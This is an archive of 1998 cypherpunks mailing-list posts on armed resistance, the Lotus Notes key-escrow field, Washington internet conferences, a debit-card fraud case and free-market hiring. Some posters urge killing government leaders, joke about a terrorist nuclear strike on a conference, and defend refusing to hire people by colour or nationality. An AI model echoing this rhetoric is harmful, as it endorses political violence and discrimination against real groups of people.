	Different realms. Crypto deals with transient/ephemeral(sp?) things
like bits & words & numbers. 

	Arms work in a more physical world of Rapists, Theives, & Dictators. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "snow" <snow@smoke.suba.com>
Date: Wed, 7 Jan 1998 14:21:25 +0800
To: tcmay@got.net (Tim May)
Subject: Re: cypherpunks and guns
In-Reply-To: <v03102801b0d7ab10ffdb@[207.167.93.63]>
Message-ID: <199801070720.BAA01765@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



> Final comment: If I find the motivation, I may finish an essay I've been
> working on about how we, the Cypherpunks and the World, are *retrogressing*
> in crypto areas. Most of the exotic applications are no longer being
> discussed, and various mundane commercial products are the main focus. Yawn.

	You mean things like Onion Routers, Crowds & the like?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "snow" <snow@smoke.suba.com>
Date: Wed, 7 Jan 1998 14:26:41 +0800
To: rdl@mit.edu (Ryan Lackey)
Subject: Re: cypherpunks and guns
In-Reply-To: <tw767nxj3q7.fsf@the-great-machine.mit.edu>
Message-ID: <199801070725.BAA01787@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



> I am fairly certain that as an irregular army soldier I could inflict
> a substantial amount of damage upon an occupying military.  With maybe
> $20k in equipment and several hundred hours of training, you could make

	If you were smart, you could do it for a lot less. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "snow" <snow@smoke.suba.com>
Date: Wed, 7 Jan 1998 14:39:34 +0800
To: isparkes@q9f47.dmst02.telekom.de (Ian Sparkes)
Subject: Re: cypherpunks and guns
In-Reply-To: <3.0.2.32.19980106144257.006f0fec@q9f47.dmst02.telekom.de>
Message-ID: <199801070729.BAA01812@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



> >that by 100 million armed citizens and you see that armed civilian
> >resistance *can* defeat an occupying army.
> The "enemy within" seems to be the main focus of the discussions in 
> the CP list. When the 'luckless squad that happens your way' is 
> manned by your countrymen at the command of their (and your) 
> government, what then?

	You answered your own question. Fight smarter, not harder. Kill
the brains and the body would follow. 

> This is from the standpoint of a 'sissy' European. I admit I am 
> poorly equipped to comment on the American Zeitgeist. However, my 
> experience of civil war victims (refugees from the E-bloc) suggests 
> that we should be concentrating on social revolution before we tool 
> up for military. There is more to be won, with a potentially much 
> lower cost.

	Any kind of social revolution will be co-opted, destroyed, or 
rendered useless by the people at the top. What it needed is a continuance 
of the technical revolution. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "snow" <snow@smoke.suba.com>
Date: Wed, 7 Jan 1998 14:44:17 +0800
To: guy@panix.com (Information Security)
Subject: Re: cypherpunks and guns
In-Reply-To: <199801061912.OAA08946@panix2.panix.com>
Message-ID: <199801070740.BAA01846@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



> #   128bit SSL module distribution *EVEN TO US CITIZENS* due to commerce
> #   department fuckedness.  Anyone know where I could get a copy?  It would
> #   really suck to have to patch the 40bit one into a 128bit version, since
> #   they do not distribute source.
> I don't know if this is the "module" form of the answer you want:
> http://www.replay.com/

	Nope, he wants the AOL SERVER, not browser

>    Tim May wrote:
>>   Final comment: If I find the motivation, I may finish an essay I've been
>>   working on about how we, the Cypherpunks and the World, are *retrogressing*
>>   in crypto areas. Most of the exotic applications are no longer being
>>   discussed, and various mundane commercial products are the main focus.
>    >   Yawn.
> How about moving this list to encrypt its transmissions in
> the recipient's public keys, just to begin encrypting Net traffic?

	At this point, there would be WAY too much overhead on the 3 or 
so servers that make up the cypherpunks mailing list. PGP encrypting every
message sent thru would take up a lot of CPU time.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 7 Jan 1998 15:52:05 +0800
To: aba@dcs.ex.ac.uk
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <199801062128.VAA00264@server.eternity.org>
Message-ID: <199801070745.CAA29531@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back wrote:

| The above "solution" to key escrow infra-structure calls from Freeh
| etc., should be credited to Carl Ellison; probably others have
| proposed it also.  Carl offered to sign some cheif spooks key, if he
| would generate one for the purpose, cheif spook declined the offer.

That was Phil Karn to NSA legal counsel at the Computers Freedom and
Privacy conference in Burlingame, 1994 or 1995.  I don't recall
hearing it before that.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 7 Jan 1998 22:12:54 +0800
To: cypherpunks@toad.com
Subject: Re: Sentencing for Electronic Copyright Infringement
In-Reply-To: <v03102800b0d8e84e5a9d@[207.167.93.63]>
Message-ID: <LeuXie15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> When the ninja narc raiders cart our computers off for analysis, I'm sure
> they can find enough violations to send us away for as many years as they
> wish.

And if Timmy knew a bit more about cryptography than he could learn by browsing
through Bruce Schneier's book, the ninja narc raiders wouldm't be able to find
shit on any of his media. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 7 Jan 1998 23:22:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <v0311070eb0d8be53e6a8@[207.94.249.133]>
Message-ID: <199801071516.JAA10807@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:

> It seems to me that if you step on the correct part of the message, you
> zap the encrypted 24 bits, and cut NSA out of the loop.  Of course the
> receiver could notice and refuse to decrypt, which would require some
> software hacking to defeat, but that is certainly doable. 

Yes - I doubt if Lotus Notes has the ability to distinguish between
messages containing ASCII for "FUD" in the workfactor reduction field and
those containing 24 genuine bits of the key in question.  It's probably
a one-instruction patch to disable Big Brother.

As I recall, the LEAF field in Clipper suffered from a similar ability
to be disabled at the user's pleasure. 

--
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Wed, 7 Jan 1998 15:33:56 +0800
To: "'Bill Stewart'" <rp@rpini.com>
Subject: RE: Location Escrow anyone ?
Message-ID: <c=AU%a=TELEMEMO_%p=TAFENSW%l=ISF10-980107072429Z-6014@ixf2m1.isd.tafensw.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Hey guys,

I wasn't suggesting that they do record exactly where everyone is
at the highest resolution possible.

Just suggesting that should they want to investigate an individual,
they could do it with pretty high detail.

Though I'm sure they'd record when and where you switch your
phone on, switch off / loose signal, switch cells and make and
receive calls and messages. That wouldn't be all that much data.

Bye for now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Thu, 8 Jan 1998 23:18:41 +0800
To: platypus@acmeonline.net
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <Pine.LNX.3.93.980103202220.155C-100000@shirley>
Message-ID: <Pine.LNX.3.91.980104133448.1037A-100000@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> > You clearly have no comprehension of the principles of the free market 
> > and the rights of businesses and individual to hire and fire whoever the 
> > fuck they like for any reason whatsoever.
> 
> My rights to swing my fists end at your noise.  When ever you interact
> with other peaple your rights are tempered by there rights.  Even Adam
> Smith recognised that its was gorverments dutie to redress the failing of
> the market.

Why there is even discussion on this point on a list whose membership is 
composed mainly of market anarchists is beyond me, the NAP and rights of 
association should clearly define the answer to this question, no 
agression is involved in the act of firing or declining to hire people 
based on their colour/nationality or any other factor whatsoever. 

> Also recall the free market model assumes that the word is full of totaly
> rational pepeale who have full knowige of the market.  Any one who has
> been on this list knows that these peaple are somewhat uncommen.

I don`t see the model that way at all, I don`t claim that my idea of a 
free market works well in practice, I believe it would but I have no 
proof, however, the model is ethically right in that it allows businesses 
and individuals to behave as they please as long as it harms no other 
person, sure, firing you may harm you by decreasing your income but this 
is not an agressive act, it is a passive one: I have declined to offer 
you, or keep you, in employment.


        Datacomms Technologies data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 8 Jan 1998 11:49:29 +0800
To: "Brian B. Riley" <brianbr@together.net>
Subject: More gun nutz
In-Reply-To: <199801080258.VAA23445@mx02.together.net>
Message-ID: <Pine.BSF.3.91.980107083227.25663E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 7 Jan 1998, Brian B. Riley wrote:

> retired ... look just recently at what happened to the Russians troops
> sent to Chechnya ... all these brand spanking new, highly trained
> proud young 19 and 20 year old troops went romping off to fight 'a
> bunch of old men' in the Chechyn Republic ... there was one little
> problem ... a big hunk of those old men had spent two to seven years
> in that same Russian Army fighting the Mujahedeen in Afghanistan ...
> and that 'bunch of old men' kicked their young asses!

That's just the new Russian capitalism. Their military had to create some 
real equipment losses to cover all the missing inventory they're selling 
on the black market.

-r.w.

p.s. - How can I get the DMV to give me "historic" tags for my slightly 
used T-64?

What's the best armored fighting vehicle for a cypherpunk?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Thu, 8 Jan 1998 00:13:07 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Sentencing for Electronic Copyright Infringement
In-Reply-To: <v03102800b0d8e84e5a9d@[207.167.93.63]>
Message-ID: <34B3D211.4148@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> Even though I'm not a "warez" trader, or even a software pirate, and even
> though I have perhaps foolishly bought many thousands of dollars worth of
> now-discontinued and now-unused products ("shelfware"), I am quite sure the
> Authorities could find dozens and dozens of violations of these new laws.

On the other hand, it's no longer in vogue to haul people off for video piracy
anymore.  Perhaps we should all stego our monitors & computers into looking
like TV's & VCR's until this blows over.  :-)

--David Miller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Thu, 8 Jan 1998 04:42:11 +0800
To: cypherpunks@cyberpass.net
Subject: Debit-card program cancelled because of fraud [FWD]
Message-ID: <v03102801b0d9833d841d@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



Date: Sun, 28 Dec 1997 09:22:45 -0500
From: Steve Bellovin <smb@research.att.com>
Subject: Debit-card program cancelled because of fraud

According to the AP, Burns National Bank (Durango, CO) is cancelling its
debit-card program because of fraud.  The article is maddeningly incomplete
about technical details.

Apparently, the "hackers" (to quote the article) counterfeited plastic cards
and "took account number sequences off software that resides on the Internet
before encoding them in the magnetic strip on the back of the card."  When
the fraud was detected, some customers had new cards issued, with some
unspecified extra security feature.  It didn't work; within a month, the
accounts were penetrated again.

Three other banks have been victimized by a similar scheme.  All four use
the same debit card vendor; Burns blames the vendor for inadequate security,
in some unspecified form.  They're looking for a new supplier; until then,
the entire program is being suspended.  Losses to date -- which are
apparently being absorbed by the banks -- total $300,000.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 8 Jan 1998 03:47:53 +0800
To: cypherpunks@cyberpass.net
Subject: Too many "Internet Conferences" in Washington
In-Reply-To: <Pine.LNX.3.95.980107140820.21602C-100000@vorlon.mit.edu>
Message-ID: <v03102802b0d98a26a9b3@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:08 AM -0800 1/7/98, Declan McCullagh wrote:
>[This is the conference Tim was criticizing yesterday. --Declan]
>

Just to be more accurate, I was criticising the _sheer frequency_ of such
conferences, with this one just being one of many. And not even the latest
such example, as yet another Washington conference on the Internet was
announced later yesterday.

I just can't understand who attends these things, besides the Usual Suspects.

Maybe we could convince them to all have their confabs on the same day, the
same day Abu Nidal explodes his nuke in Crystal City?

(Or invite the Algerians in for a Hackers Conference? Get medeival on their
asses.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 8 Jan 1998 03:55:24 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Too many "Internet Conferences" in Washington
In-Reply-To: <v03102802b0d98a26a9b3@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980107114602.11363B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



In truth, I mistyped. Tim not only was talking about the frequency (and I
gather, the danger) of the conferences, he was responding to the ACM one,
not the WW one. 

Now, who attends these things?

1. Journalists
2. Government bureaucrats happy to have a day off from work, who want to
position themselves as "Net-savvy"
3. Lobbyists who bill it to clients
4. Think tank people who hope someone reads their papers

The Naderite "Appraising Microsoft" conference seemed to be populated
mainly by journalists, at some points.

These conferences can be dangerous. If the best thing for the Net is for
DC to leave it alone, that principle leaves no space for Washington
lobbyists who bill by the hour (and through the nose) for their expertise:
pressuring various portions of the government. This is why lobbyists,
including so-called "Net-lobbyists" are not what the Net, and freedom,
need.

-Declan



On Wed, 7 Jan 1998, Tim May wrote:

> At 11:08 AM -0800 1/7/98, Declan McCullagh wrote:
> >[This is the conference Tim was criticizing yesterday. --Declan]
> >
> 
> Just to be more accurate, I was criticising the _sheer frequency_ of such
> conferences, with this one just being one of many. And not even the latest
> such example, as yet another Washington conference on the Internet was
> announced later yesterday.
> 
> I just can't understand who attends these things, besides the Usual Suspects.
> 
> Maybe we could convince them to all have their confabs on the same day, the
> same day Abu Nidal explodes his nuke in Crystal City?
> 
> (Or invite the Algerians in for a Hackers Conference? Get medeival on their
> asses.)
> 
> --Tim May
> 
> The Feds have shown their hand: they want a ban on domestic cryptography
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^2,976,221   | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 8 Jan 1998 04:10:47 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Too many "Internet Conferences" in Washington
In-Reply-To: <v03102802b0d98a26a9b3@[207.167.93.63]>
Message-ID: <v03102803b0d98e7faf2a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:50 AM -0800 1/7/98, Declan McCullagh wrote:
>In truth, I mistyped. Tim not only was talking about the frequency (and I
>gather, the danger) of the conferences, he was responding to the ACM one,
>not the WW one.

Yeah, I didn't even recall which one I was commenting on. Just too many of
these damned boondoggles.

The only conference recently which as sounded interesting was the one on
"anonymity" down near LA recently...I might have gone, but I don't recall
hearing about it, or being invited. Until it was over, of course.

(I guess it was filled up with journalists, judging from the various
articles which have come out of it. Mostly cheesy articles, Declan's
excepted.)

>Now, who attends these things?
>
>1. Journalists
>2. Government bureaucrats happy to have a day off from work, who want to
>position themselves as "Net-savvy"
>3. Lobbyists who bill it to clients
>4. Think tank people who hope someone reads their papers

Yep. Boondoggles.

But as John G. and Declan and others have noted, these things can do real
damage. By skimming the surface, they are really just platforms for
position advocacy. Whether "conferences" on "ratings," or "Net.porn," or
"anonymity," or whatever, they end up being fora for certain policy wonks
to make their cases. And lazy staffers can then regurgitate the positions
as proposed legislation. (Thus satisfying their quotas, and proving they
are working hard.)

>The Naderite "Appraising Microsoft" conference seemed to be populated
>mainly by journalists, at some points.

Too many fucking journalists. Too many fucking staffers. Too many fucking
bureaucrats, lackeys, satraps, and empire builders.

The whole city, America's imperial city, is corruption on earth. The
Ayotollah had that one right.

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 8 Jan 1998 04:38:47 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Too many "Internet Conferences" in Washington
In-Reply-To: <v03102803b0d98e7faf2a@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980107122231.11363I-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 7 Jan 1998, Tim May wrote:

> The only conference recently which as sounded interesting was the one on
> "anonymity" down near LA recently...I might have gone, but I don't recall
> hearing about it, or being invited. Until it was over, of course.
> 
> (I guess it was filled up with journalists, judging from the various
> articles which have come out of it. Mostly cheesy articles, Declan's
> excepted.)

I think I was the only full-time journalist invited to participate. There
were maybe four or so jlists covering it. From the web site:

Attendance at this conference will be by invitation only. About 35
individuals will represent a
variety of backgrounds and perspectives including the computing industry
(such as Internet service
providers, network administrators, and providers of "anonymizing"
services) the legal community,
professional societies, academic institutions, law enforcement agencies,
and other agencies of
government. 

> But as John G. and Declan and others have noted, these things can do real
> damage. By skimming the surface, they are really just platforms for
> position advocacy. Whether "conferences" on "ratings," or "Net.porn," or
> "anonymity," or whatever, they end up being fora for certain policy wonks
> to make their cases. And lazy staffers can then regurgitate the positions
> as proposed legislation. (Thus satisfying their quotas, and proving they
> are working hard.)

Lobbyists need to show they're doing something to justify the money they
grab from corporations (many of which could be doing something better with
this cash, like R&D). Hence they host conferences and attend others.

There are very, very few groups out there that say Washington should take
a "hands off" approach to the Internet. Oh, sure, high tech firms
(including Microsoft) will use it as a good PR line but wait 'til they get
a chance to pass a criminal copyright bill. Even the librarians and
scientists, generally good on issues like content and copyright, spend
much of their time trying to grab more federal dollars. Like the new
federal phone tax the librarians and teachers pushed for: something like
$10-20/year per phone line. 

Then of course there's the religious right and the law enforcement
lobbyists, all of which have their own pet projects and legislation.

There are few groups who are consistently opposed to the government
mucking around with the Internet. Cato Institute, Competitive Enterprise
Institute, and maybe American Enterprise Institute and Citizens for Sound
Economy and the Federalist Society.

Very, very few.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 8 Jan 1998 02:50:27 +0800
To: Kent Crispin <kent@songbird.com>
Subject: Re: cypherpunks and guns
In-Reply-To: <19980107001651.29456@songbird.com>
Message-ID: <199801071844.NAA28170@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <19980107001651.29456@songbird.com>, on 01/07/98 
   at 03:16 AM, Kent Crispin <kent@songbird.com> said:

>On Wed, Jan 07, 1998 at 01:25:45AM -0600, snow wrote:
>> > I am fairly certain that as an irregular army soldier I could inflict
>> > a substantial amount of damage upon an occupying military.  With maybe
>> > $20k in equipment and several hundred hours of training, you could make
>> 
>> 	If you were smart, you could do it for a lot less. 

>That presumes the enemy is dumb.  An amusing fantasy.

The fact that they collect a paycheck from the government is prima facie
evidence of diminished mental capacity.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNLPK2o9Co1n+aLhhAQFGnQP/XjQolE3fElFXPrPWSe7p3lM7QY/kEMYr
AF3CXUr1ov0IFRfqItryMSM8eGa65V69X1FS1AagXgzz5IpZ89E4wbiPMC5Rh8aP
oifllXC+G7+bgcBZyzzRKQ9ZXlMckHnSpPCyFq1xE35Uj6gbu790oVd92yzvf5sy
pjALZQjE7MI=
=cG0G
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 8 Jan 1998 04:38:05 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Too many "Internet Conferences" in Washington
In-Reply-To: <v03102803b0d98e7faf2a@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980107123113.11363J-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



YAICIW


January 5, 1998: Information and registration details are now 
available on the Thursday, January 22, 1998 meeting in 
Washington, D.C.: "Internet Domain Name System - gTLD-MoU Information 
Session - An Opportunity to Meet Members of the Policy Oversight 
Committee (POC) and Council of Registrars (CORE) to Discuss Policy, 
Legal and Technical Aspects of the new Top Level Domains". See 
http://www.gtld-mou.org/docs/meetings.html#jan22 for information
and registration form.

January 5, 1998: CORE will have a Plenary Meeting on January 21, 23, 
24, 1998 in Washington, D.C.  See 
http://www.gtld-mou.org/docs/meetings.html#jan21






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 8 Jan 1998 05:11:17 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Too many "Internet Conferences" in Washington
In-Reply-To: <v03102803b0d98e7faf2a@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980107123211.11363K-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



YAICIW

Look for more taxes to pay for rural phone connections


Connecting All
                                Americans for the 21st
                                       Century:
                                 Telecommunications
                                 Links in Low Income
                                 & Rural Communities
                                  February 24-27, 1998
                                  Washington, D.C.

                                 A Policy Conference & A
                                  Practitioners Workshop



                       sponsored by

           United States Department of Commerce
    National Telecommunications and Information Administration (NTIA)

                           &

           The Public Utility Law Project (PULP)
  A Non Profit Public Interest Law Firm Representing Low Income and Rural
                        Consumers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 8 Jan 1998 02:44:53 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <v0311070eb0d8be53e6a8@[207.94.249.133]>
Message-ID: <199801071847.NAA28200@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v0311070eb0d8be53e6a8@[207.94.249.133]>, on 01/07/98 
   at 12:10 AM, Bill Frantz <frantz@netcom.com> said:

>At 11:49 AM -0800 1/6/98, Eric Cordian wrote:
>>I managed to find a document entitled "Security in Lotus Notes and the
>>Internet" on the Web.
>>
>>It describes the weakening procedure as follows.
>>
>>  "No matter which version of Notes you are using, encryption uses the
>>   full 64-bit key size. However, the International edition takes 24 bits
>>   of the key and encrypts it using an RSA public key for which the US
>>   National Security Agency holds the matching private key. This
>>   encrypted portion of the key is then sent with each message as an
>>   additional field, the workfactor reduction field. The net result of
>>   this is that an illegitimate hacker has to tackle 64-bit encryption,
>>   which is at or beyond the practical limit for current decryption
>>   technology and hardware. The US government, on the other hand, only
>>   has to break a 40-bit key space, which is much easier (2 to the power
>>   of 24 times easier, to be precise)."

>It seems to me that if you step on the correct part of the message, you
>zap the encrypted 24 bits, and cut NSA out of the loop.  Of course the
>receiver could notice and refuse to decrypt, which would require some
>software hacking to defeat, but that is certainly doable.

Wouldn't it be much better just to not use the crap?!?

Why should we give our money to a company that has shown that they will
sell us out at the first chance of making a buck doing so??

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNLPLlY9Co1n+aLhhAQHt5gP+NtHd38qR7JcqpL1hCxdk4Tz1N239kIIm
7V6vmiM76oinIDXmsgJoZN9NgLdI8kd7otJt1nLOlEkbGpZ9lAn69pdeB0BzAM2Q
OOXhPsy6AzB3y/wdMY2wXpgmTAIT5CpW/014NqtBLIgoL2g2pXseTe416OixxBDv
m9aJKKvHgb0=
=Us1n
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 8 Jan 1998 04:43:59 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Too many "Internet Conferences" in Washington
In-Reply-To: <v03102803b0d98e7faf2a@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980107123844.7420A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



YAICIW

(well actually a press conference)

January 7

	1:30 p.m. POLITICS ONLINE - PoliticsOnLine publisher Phil Noble
holds a news conference to release a report on how the Internet was used
in politics last year and prospects for usage this year.
	Location: National Press Club.
	Contact: Willie Blacklow, 301-652-3623.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 8 Jan 1998 04:46:09 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Too many "Internet Conferences" in Washington
In-Reply-To: <v03102803b0d98e7faf2a@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980107124042.7420B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



YAICIW

(disclaimer: I am speaking at this one)


                             Cyberjournalism98
    The best and brightest in cyberjournalism will explore the future of
    internet based news and reporting at the Cyberjournalism98 symposium
    on Jan. 8-10, 1998 in Washington, D.C. and jointly sponsored by the
                 National Press Club and the Freedom Forum.
                 
                       For information on exhibiting atCyberjournalism98
contact Yvonne
   Miller at MediaMasters@rocketmail.com For information about attending
        the conference call Euraine Brooks at 703.284.2809 or email
                          ebrooks@freedomforum.org
                          






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 8 Jan 1998 05:10:59 +0800
To: cypherpunks@cyberpass.net
Subject: Lessig on antitrust and government regulation
Message-ID: <Pine.GSO.3.95.980107124703.7420C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Lessig is the special master appointed by the judge in the Microsoft
consent decree case. He once wrote:

>Whether a regulation is
>rational turns on the facts, and what counts as "the facts" turns on the
>theory that animates inquiry into the facts.

Wow.

How do we know what theory is the right one, and when we should change it?

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 8 Jan 1998 05:13:31 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Too many "Internet Conferences" in Washington
In-Reply-To: <v03102803b0d98e7faf2a@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980107130423.7420D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



YAISIW

 Washington, D.C.  - January 6, 1998 - Ira Magaziner, President 
     Clinton's domestic policy development advisor, will outline the U.S. 
     Government position on electronic commerce and reform of the Domain 
     Name System at the Internet Executive Summits in London (on January 
     19, 1998, by video conference link) and Washington (on February 4, 
     1998).  Magaziner has spearheaded the Clinton Administration's
efforts 
     on electronic commerce and has taken a leading role in the U.S. 
     Government's work on privatization of the Domain Name System.
     
     Sally Tate, joint managing director of Prince plc, which is 
     facilitating the Summits, said that "Governments around the world
want 
     the private sector to take the lead to reform and manage the
Internet. 
     The Internet Executive Summits will enable business leaders to have 
     direct participation in formulating the private sector initiative to 
     ensure that the solution will fully reflect its requirements."
     
     A U.S. Inter-Agency Taskforce, set up in April 1997, it is expected
to 
     issue policy recommendations based on responses to a request for 
     comments issued in July 1997 and thousands of pages of emailed 
     recommendations received each week.   Magaziner's team has also had 
     consultations with hundreds of major Internet and telecommunications 
     companies in Washington D.C. in December 1997.
     
     The open door global Internet Executive Summits in London (January 
     19-20, 1998) and Washington (February 3-4, 1998) will help to set the 
     agenda for transition of the current Internet Domain Name and 
     governance systems.  All delegates will be eligible to participate in 
     the reform committees / initiatives formed at the Summits. 
     
     Representatives from all Internet stakeholder groups are expected to 
     attend the Summits including: commercial organizations worldwide, 
     national governments and intergovernmental organizations, law firms / 
     corporate legal departments, Internet consumer groups (including the 
     research and education community), technology companies and Internet 
     service providers (ISP's).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 8 Jan 1998 04:51:13 +0800
To: cypherpunks@toad.com
Subject: Bruce Schneier, Sandia, FBI and the REAL WORLD
